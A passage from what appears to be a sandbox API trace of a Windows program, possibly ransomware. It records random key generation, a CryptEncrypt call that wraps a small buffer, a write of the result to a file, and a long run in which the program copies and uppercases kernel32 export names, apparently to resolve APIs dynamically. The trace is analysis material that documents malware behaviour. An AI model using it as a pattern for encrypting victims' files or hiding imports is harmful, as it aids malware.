lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.675] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.675] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.675] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.675] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.677] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.677] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.677] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.678] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.678] CloseHandle (hObject=0x464) returned 1 [0079.678] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.678] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.679] CloseHandle (hObject=0x0) returned 0 [0079.679] CloseHandle (hObject=0x460) returned 1 [0079.680] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.680] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.680] GetTickCount () returned 0x114c68a [0079.680] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.681] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.681] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.681] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.681] lstrlenA (lpString="kernel32.dll") returned 12 [0079.682] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.682] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.682] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.682] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.682] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.682] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.682] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.682] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.682] lstrlenA (lpString="ADDATOMA") returned 8 [0079.682] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.682] lstrlenA (lpString="ADDATOMW") returned 8 [0079.682] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.682] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.682] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.682] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.682] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.682] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.682] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.682] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.682] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.682] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.682] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.682] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.682] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.682] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.682] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.682] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.682] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.682] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.682] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.682] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.682] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.682] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.682] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.682] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.682] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.683] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.683] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.683] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.683] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.683] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.683] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.683] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.683] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.683] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.683] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.683] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.683] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.683] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.683] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.683] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.683] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.683] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.683] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.683] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.683] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.683] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.683] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.683] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.683] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.683] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.683] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.683] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.683] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.683] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.683] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.683] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.683] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.683] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.683] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.683] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.683] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.684] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.684] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.684] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.684] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.684] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.684] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.684] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.684] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.684] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.684] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.684] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.684] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.684] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.684] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.684] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.684] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.684] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.684] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.684] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.684] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.684] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.684] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.684] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.684] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.684] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.684] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.684] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.684] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.684] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.684] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.684] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.684] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.684] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.684] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.684] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.685] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.685] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.685] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.685] lstrlenA (lpString="BEEP") returned 4 [0079.685] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.685] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.685] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.685] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.685] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.685] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.685] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.685] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.685] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.685] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.685] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.685] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.685] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.685] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.685] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.685] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.685] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.685] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.685] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.685] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.685] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.685] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.685] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.685] lstrlenA (lpString="CANCELIO") returned 8 [0079.685] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.685] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.685] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.685] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.685] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.685] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.685] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.685] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.686] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.686] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.686] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.686] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.686] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.686] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.686] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.686] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.686] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.686] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.686] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.686] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.686] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.686] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.686] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.686] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.686] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.686] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.686] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.686] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.686] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.686] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.686] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.686] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.686] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.686] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.686] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.686] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.686] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.686] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.686] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.686] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.686] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.686] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.686] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.686] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.687] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.687] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.687] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.687] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.687] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.687] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.687] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.687] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.687] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.687] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.687] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.687] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.687] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.687] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.687] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.687] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.687] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.687] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.687] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.687] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.687] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.687] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.687] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.687] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.687] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.687] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.687] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.687] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.687] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.687] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.687] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.687] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.687] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.687] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.687] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.687] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.688] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.688] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.688] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" 